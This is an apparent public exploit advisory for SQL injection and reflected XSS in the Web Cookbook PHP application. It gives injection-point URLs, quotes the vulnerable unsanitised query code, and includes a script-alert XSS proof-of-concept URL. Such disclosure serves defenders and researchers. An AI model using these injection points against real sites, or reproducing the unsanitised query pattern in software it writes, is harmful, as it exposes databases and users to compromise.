# Exploit Title: Web Cookbook Multiple SQL Injection # Date: 2013/3/12 # Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com # Software Link: http://sourceforge.net/projects/webcookbook/ # Author HomePage: http://security-geeks.blogspot.com/ # Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3 # SQL Injection http://localhost/cook/searchrecipe.php?sstring=[SQLi] http://localhost/cook/showtext.php?mode=[SQLi] http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient= http://localhost/cook/showtext.php?mode=[SQLi] #Proof Of Concept In showtext.php Code: $mode = $_GET["mode"]; . . showText($mode, $art);//sending $mode to a function without sanitizing it . . function showText($kategorie, $art) { initDB(); echo "<div class=\"rdisplay\">\n"; $query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry $result = mysql_query($query); . . All GET Fields Are Vuln To SQLi http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient= #p0c In searchrecipe.php $title = $_GET['title']; $prefix = $_GET['prefix']; $preparation = $_GET['preparation']; $postfix = $_GET['postfix']; $tipp = $_GET['tipp']; $ingredient = $_GET['ingredient']; . . . if ($title != "") { $sstring = "a.title LIKE '%$title%' "; } . . searchRecipe($mode, $sstring); . . In Function SearchRecipe $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title"; http://localhost/cook/searchrecipe.php?sstring=[SQLi] P0c $sstring = $_GET['sstring']; if ($sstring != "") { searchRecipe(0, $sstring); . . . $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title"; A simple Non-Presistent XSS http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient= #Independent Pakistani Security Researcher